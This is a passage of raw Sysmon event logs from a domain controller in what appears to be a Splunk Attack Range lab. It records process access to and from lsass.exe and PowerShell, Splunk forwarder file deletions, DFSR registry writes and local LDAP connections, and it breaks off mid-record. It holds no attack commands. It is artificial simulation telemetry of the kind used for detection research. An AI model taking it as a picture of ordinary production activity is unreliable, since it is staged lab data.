12:06:11.030{266CAFBE-646A-6064-0B00-00000000AE01}8561016C:\Windows\system32\lsass.exe{266CAFBE-65AB-6064-5001-00000000AE01}2456C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\system32\lsasrv.dll+249cd|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 23542300x80000000000000009990Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:06:12.748{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7C5295B962B6722B32576706AC9011FC,SHA256=CE3EF6B71D57AC0A0ED2D2D9D8CE5DB17C9525911BDB3FC07C025326ABFDD741,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000009989Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:06:12.326{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=18AF120D4531285E7418381D58703DB5,SHA256=B381E195461ADC9F3F7F478B49394D44243B9CBE5DC4A9A3A79A6C9C792A13BA,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000009991Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:06:13.779{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=90F121996622A3BB765F2BE80F8B050E,SHA256=A735A067D6E48A3D468A21A4486819E6DD24E24425FC99BF97C4D078AC5120F1,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000010007Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:06:14.810{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=48A0BA4587C19DB1F2DF9A570C17CA6B,SHA256=328382C64DFD1DD735242B41BE2ECF35953D5CB3DA03F30698837B2DD02B2265,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000010006Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:06:14.716{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\ApplicationMD5=2EA58FABDBA3D69D133A324831274F89,SHA256=9FED9E0FE153F5478A6F46B6AA5C68B2AF31D998AA3CF5B54D7F82A331E4B5AF,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000010005Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:06:14.701{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\ApplicationMD5=E09587E882E3CA9E092E04ACF3BB3A2E,SHA256=9679E867D1D5B741F0632740E0123B53540C4010797972C38D7380C2EC5C521B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000010004Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:06:14.669{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\ApplicationMD5=E09587E882E3CA9E092E04ACF3BB3A2E,SHA256=9679E867D1D5B741F0632740E0123B53540C4010797972C38D7380C2EC5C521B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000010003Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:06:14.669{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\ApplicationMD5=54D4FB4CECE767138E0CC9729BC1D798,SHA256=4A3FBF81CC56644DE7BEED1BE6E221E6B8D88178E487E13EAD9B774F26C068CF,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000010002Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:06:14.638{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\DFS ReplicationMD5=B5E71D215F710674AC4A1A3A4D5E1262,SHA256=27AEE020C8B304D0AA8C36FD40E182B0D2CFA92A30A56E883813DAB0D2B30E10,IMPHASH=00000000000000000000000000000000falsetrue 17141700x800000000000000010001Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-CreatePipe2021-03-31 12:06:14.638{266CAFBE-647D-6064-3100-00000000AE01}2672\Winsock2\CatalogChangeListener-a70-0C:\Windows\system32\DFSRs.exe 10341000x800000000000000010000Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:06:14.638{266CAFBE-646C-6064-1200-00000000AE01}11961468C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3100-00000000AE01}2672C:\Windows\system32\DFSRs.exe0x100000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|c:\windows\system32\es.dll+14045|c:\windows\system32\es.dll+200bc|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e 10341000x80000000000000009999Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:06:14.623{266CAFBE-646A-6064-0B00-00000000AE01}856976C:\Windows\system32\lsass.exe{266CAFBE-647D-6064-3100-00000000AE01}2672C:\Windows\system32\DFSRs.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\lsasrv.dll+10d9e|C:\Windows\system32\lsasrv.dll+1ecba|C:\Windows\SYSTEM32\samsrv.dll+5df1|C:\Windows\SYSTEM32\samsrv.dll+5cf2|C:\Windows\SYSTEM32\samsrv.dll+1794e|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000009998Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:06:14.623{266CAFBE-646A-6064-0B00-00000000AE01}8561016C:\Windows\system32\lsass.exe{266CAFBE-647D-6064-3100-00000000AE01}2672C:\Windows\system32\DFSRs.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\lsasrv.dll+10d9e|C:\Windows\system32\lsasrv.dll+1ecba|C:\Windows\SYSTEM32\samsrv.dll+5df1|C:\Windows\SYSTEM32\samsrv.dll+5cf2|C:\Windows\SYSTEM32\samsrv.dll+1794e|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 13241300x80000000000000009997Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-SetValue2021-03-31 12:06:14.591{266CAFBE-647D-6064-3100-00000000AE01}2672C:\Windows\system32\DFSRs.exeHKLM\System\CurrentControlSet\Services\DFSR\Parameters\Volumes\69825A4F-0000-0000-0000-100000000000\Volume Configuration File\\.\C:\System Volume Information\DFSR\Config\Volume_69825A4F-0000-0000-0000-100000000000.XML 13241300x80000000000000009996Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-SetValue2021-03-31 12:06:14.591{266CAFBE-647D-6064-3100-00000000AE01}2672C:\Windows\system32\DFSRs.exeHKLM\System\CurrentControlSet\Services\DFSR\Parameters\Replication Groups\D1286CDE-9764-40EF-8307-AEB9B8BDF7DB\Config SourceDWORD (0x00000001) 13241300x80000000000000009995Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-SetValue2021-03-31 12:06:14.591{266CAFBE-647D-6064-3100-00000000AE01}2672C:\Windows\system32\DFSRs.exeHKLM\System\CurrentControlSet\Services\DFSR\Parameters\Replication Groups\D1286CDE-9764-40EF-8307-AEB9B8BDF7DB\Replica Set Configuration File\\?\C:\System Volume Information\DFSR\Config\Replica_D1286CDE-9764-40EF-8307-AEB9B8BDF7DB.XML 23542300x80000000000000009994Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:06:14.576{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\DFS ReplicationMD5=289EDC9A13E304519631C7C095757F5F,SHA256=CC06A31A7347D1D89A5B1E7BABB0FE102BE34698D6973439759436A8D8B5E500,IMPHASH=00000000000000000000000000000000falsetrue 734700x80000000000000009993Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:06:14.560{266CAFBE-647D-6064-3100-00000000AE01}2672C:\Windows\System32\dfsrs.exeC:\Windows\System32\cryptdll.dll10.0.14393.2969 (rs1_release.190503-1820)Cryptography ManagerMicrosoft® Windows® Operating SystemMicrosoft Corporationcryptdll.dllMD5=4B31902F1E0B79CE7E46D9877647C1CC,SHA256=8925892119315293C49D09A26191149660934BF1E5D3D023722E90339ADA38AA,IMPHASH=CAB6D6025DF08B0D0BC6259D625E2778trueMicrosoft WindowsValid 354300x80000000000000009992Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:06:12.493{266CAFBE-64F5-6064-0301-00000000AE01}6500C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-892.attackrange.local53653-false10.0.1.12-8000- 23542300x800000000000000010010Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:06:15.825{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6D0095F24D09B689B331BAED94277408,SHA256=720D9881CB2BDB0DE22A443C0DF9472838B434D3009687F32ECDC03EB8C15CD2,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000010009Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:06:15.201{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=3A8F35FB1853726D2A7285DCC9C44DAE,SHA256=DF89B85D1415DC4525AD7C8137C3313F0CF29A139326B4B4B7C938D54285AD16,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000010008Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:06:15.201{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=58C3D50FDCC09A976A2B73B92371D5EA,SHA256=899A3BF8284D844BD8843FFF1263AE687FB3A864A806855294618F80F234C5BD,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000010034Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:06:16.841{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=FFB65FA51FDAAF9C8961AF7A51031ACA,SHA256=B6901796A66728FB267F8FA31E9230BAA9B1B1D00615C10A20F4696C1F5599B6,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000010033Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:06:15.130{266CAFBE-646A-6064-0B00-00000000AE01}856C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcpfalsetruefe80:0:0:0:8c4d:e56a:c9ce:fd2bwin-dc-892.attackrange.local53665-truefe80:0:0:0:8c4d:e56a:c9ce:fd2bwin-dc-892.attackrange.local389ldap 354300x800000000000000010032Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:06:15.130{266CAFBE-647D-6064-3100-00000000AE01}2672C:\Windows\System32\dfsrs.exeNT AUTHORITY\SYSTEMtcptruetruefe80:0:0:0:8c4d:e56a:c9ce:fd2bwin-dc-892.attackrange.local53665-truefe80:0:0:0:8c4d:e56a:c9ce:fd2bwin-dc-892.attackrange.local389ldap 354300x800000000000000010031Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:06:15.121{266CAFBE-646A-6064-0B00-00000000AE01}856C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcpfalsetruefe80:0:0:0:8c4d:e56a:c9ce:fd2bwin-dc-892.attackrange.local53664-truefe80:0:0:0:8c4d:e56a:c9ce:fd2bwin-dc-892.attackrange.local389ldap 354300x800000000000000010030Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:06:15.121{266CAFBE-647D-6064-3100-00000000AE01}2672C:\Windows\System32\dfsrs.exeNT AUTHORITY\SYSTEMtcptruetruefe80:0:0:0:8c4d:e56a:c9ce:fd2bwin-dc-892.attackrange.local53664-truefe80:0:0:0:8c4d:e56a:c9ce:fd2bwin-dc-892.attackrange.local389ldap 354300x800000000000000010029Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:06:15.019{266CAFBE-646A-6064-0B00-00000000AE01}856C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcpfalsetruefe80:0:0:0:8c4d:e56a:c9ce:fd2bwin-dc-892.attackrange.local53663-truefe80:0:0:0:8c4d:e56a:c9ce:fd2bwin-dc-892.attackrange.local389ldap 354300x800000000000000010028Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:06:15.019{266CAFBE-647D-6064-3100-00000000AE01}2672C:\Windows\System32\dfsrs.exeNT AUTHORITY\SYSTEMtcptruetruefe80:0:0:0:8c4d:e56a:c9ce:fd2bwin-dc-892.attackrange.local53663-truefe80:0:0:0:8c4d:e56a:c9ce:fd2bwin-dc-892.attackrange.local389ldap 354300x800000000000000010027Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:06:15.014{266CAFBE-646A-6064-0B00-00000000AE01}856C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcpfalsetruefe80:0:0:0:8c4d:e56a:c9ce:fd2bwin-dc-892.attackrange.local53662-truefe80:0:0:0:8c4d:e56a:c9ce:fd2bwin-dc-892.attackrange.local389ldap 354300x800000000000000010026Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:06:15.014{266CAFBE-647D-6064-3100-00000000AE01}2672C:\Windows\System32\dfsrs.exeNT AUTHORITY\SYSTEMtcptruetruefe80:0:0:0:8c4d:e56a:c9ce:fd2bwin-dc-892.attackrange.local53662-truefe80:0:0:0:8c4d:e56a:c9ce:fd2bwin-dc-892.attackrange.local389ldap 354300x800000000000000010025Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:06:14.972{266CAFBE-646A-6064-0B00-00000000AE01}856C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcpfalsetruefe80:0:0:0:8c4d:e56a:c9ce:fd2bwin-dc-892.attackrange.local53660-truefe80:0:0:0:8c4d:e56a:c9ce:fd2bwin-dc-892.attackrange.local389ldap 354300x800000000000000010024Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:06:14.972{266CAFBE-647D-6064-3100-00000000AE01}2672C:\Windows\System32\dfsrs.exeNT AUTHORITY\SYSTEMtcptruetruefe80:0:0:0:8c4d:e56a:c9ce:fd2bwin-dc-892.attackrange.local53660-truefe80:0:0:0:8c4d:e56a:c9ce:fd2bwin-dc-892.attackrange.local389ldap 354300x800000000000000010023Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:06:14.960{266CAFBE-646A-6064-0B00-00000000AE01}856C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcpfalsetruefe80:0:0:0:8c4d:e56a:c9ce:fd2bwin-dc-892.attackrange.local53659-truefe80:0:0:0:8c4d:e56a:c9ce:fd2bwin-dc-892.attackrange.local389ldap 354300x800000000000000010022Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:06:14.960{266CAFBE-647D-6064-3100-00000000AE01}2672C:\Windows\System32\dfsrs.exeNT AUTHORITY\SYSTEMtcptruetruefe80:0:0:0:8c4d:e56a:c9ce:fd2bwin-dc-892.attackrange.local53659-truefe80:0:0:0:8c4d:e56a:c9ce:fd2bwin-dc-892.attackrange.local389ldap 22542200x800000000000000010021Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:06:14.933{266CAFBE-647D-6064-3100-00000000AE01}2672win-dc-892.attackrange.local0fe80::8c4d:e56a:c9ce:fd2b;::ffff:10.0.1.14;C:\Windows\System32\dfsrs.exe 354300x800000000000000010020Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:06:14.938{266CAFBE-646A-6064-0B00-00000000AE01}856C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcpfalsetruefe80:0:0:0:8c4d:e56a:c9ce:fd2bwin-dc-892.attackrange.local53658-truefe80:0:0:0:8c4d:e56a:c9ce:fd2bwin-dc-892.attackrange.local389ldap 354300x800000000000000010019Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:06:14.938{266CAFBE-647D-6064-3100-00000000AE01}2672C:\Windows\System32\dfsrs.exeNT AUTHORITY\SYSTEMtcptruetruefe80:0:0:0:8c4d:e56a:c9ce:fd2bwin-dc-892.attackrange.local53658-truefe80:0:0:0:8c4d:e56a:c9ce:fd2bwin-dc-892.attackrange.local389ldap 354300x800000000000000010018Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:06:14.929{266CAFBE-646A-6064-0B00-00000000AE01}856C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcpfalsetruefe80:0:0:0:8c4d:e56a:c9ce:fd2bwin-dc-892.attackrange.local53657-truefe80:0:0:0:8c4d:e56a:c9ce:fd2bwin-dc-892.attackrange.local49666- 354300x800000000000000010017Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:06:14.929{266CAFBE-647D-6064-3100-00000000AE01}2672C:\Windows\System32\dfsrs.exeNT AUTHORITY\SYSTEMtcptruetruefe80:0:0:0:8c4d:e56a:c9ce:fd2bwin-dc-892.attackrange.local53657-truefe80:0:0:0:8c4d:e56a:c9ce:fd2bwin-dc-892.attackrange.local49666- 354300x800000000000000010016Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:06:14.927{266CAFBE-646C-6064-0D00-00000000AE01}612C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsetruefe80:0:0:0:8c4d:e56a:c9ce:fd2bwin-dc-892.attackrange.local53656-truefe80:0:0:0:8c4d:e56a:c9ce:fd2bwin-dc-892.attackrange.local135epmap 354300x800000000000000010015Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:06:14.927{266CAFBE-647D-6064-3100-00000000AE01}2672C:\Windows\System32\dfsrs.exeNT AUTHORITY\SYSTEMtcptruetruefe80:0:0:0:8c4d:e56a:c9ce:fd2bwin-dc-892.attackrange.local53656-truefe80:0:0:0:8c4d:e56a:c9ce:fd2bwin-dc-892.attackrange.local135epmap 354300x800000000000000010014Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:06:14.915{266CAFBE-646A-6064-0B00-00000000AE01}856C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcpfalsetruefe80:0:0:0:8c4d:e56a:c9ce:fd2bwin-dc-892.attackrange.local53655-truefe80:0:0:0:8c4d:e56a:c9ce:fd2bwin-dc-892.attackrange.local389ldap 354300x800000000000000010013Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:06:14.915{266CAFBE-647D-6064-3100-00000000AE01}2672C:\Windows\System32\dfsrs.exeNT AUTHORITY\SYSTEMtcptruetruefe80:0:0:0:8c4d:e56a:c9ce:fd2bwin-dc-892.attackrange.local53655-truefe80:0:0:0:8c4d:e56a:c9ce:fd2bwin-dc-892.attackrange.local389ldap 354300x800000000000000010012Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:06:14.509{266CAFBE-646A-6064-0B00-00000000AE01}856C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcpfalsetrue0:0:0:0:0:0:0:1win-dc-892.attackrange.local53654-true0:0:0:0:0:0:0:1win-dc-892.attackrange.local389ldap 354300x800000000000000010011Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:06:14.509{266CAFBE-647D-6064-3000-00000000AE01}2648C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exeNT AUTHORITY\SYSTEMtcptruetrue0:0:0:0:0:0:0:1win-dc-892.attackrange.local53654-true0:0:0:0:0:0:0:1win-dc-892.attackrange.local389ldap 23542300x800000000000000010035Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:06:17.840{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=59822D24B8C2F959B58B09BD7A45242E,SHA256=FD9663F96104F399AD2B61424EB893FB087F6D14F50A9493B1C69F8A3CB9D82F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000010036Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:06:18.871{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F42AE135EFED06B18EDDE6C81FA20C67,SHA256=274DCAE6DC4E9ABA4D10D6DCD22AEF7B50536B4418A12A37FA9DF361E45CE0B4,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000010038Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:06:19.933{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=DDADB0399BF1C9F48867E7907ED64F68,SHA256=16F1AF4DB1EEC84EEAC4745697873E61FB6BE0CD479E6859D361E24F04C2E67B,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000010037Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:06:18.446{266CAFBE-64F5-6064-0301-00000000AE01}6500C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-892.attackrange.local53666-false10.0.1.12-8000- 23542300x800000000000000010039Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:06:20.980{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6C217AF914387983FBD0D5F06E05E1D0,SHA256=9E9F751EDA39F32119039156BB1F526BE396D655DB98C774F7B2437F730E05F0,IMPHASH=00000000000000000000000000000000falsetrue 13241300x800000000000000010040Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-SetValue2021-03-31 12:06:21.308{266CAFBE-646C-6064-1200-00000000AE01}1196C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\W32Time\Config\LastKnownGoodTimeQWORD (0x01d72626-0x43753235) 23542300x800000000000000010041Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:06:22.105{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F2C02CA0A4755B55A81D74ACC8648744,SHA256=64153973ECA88E38A1A368025F1FA0077712793CD9AE8229E22849F79D7A1B29,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000010042Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:06:23.136{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program 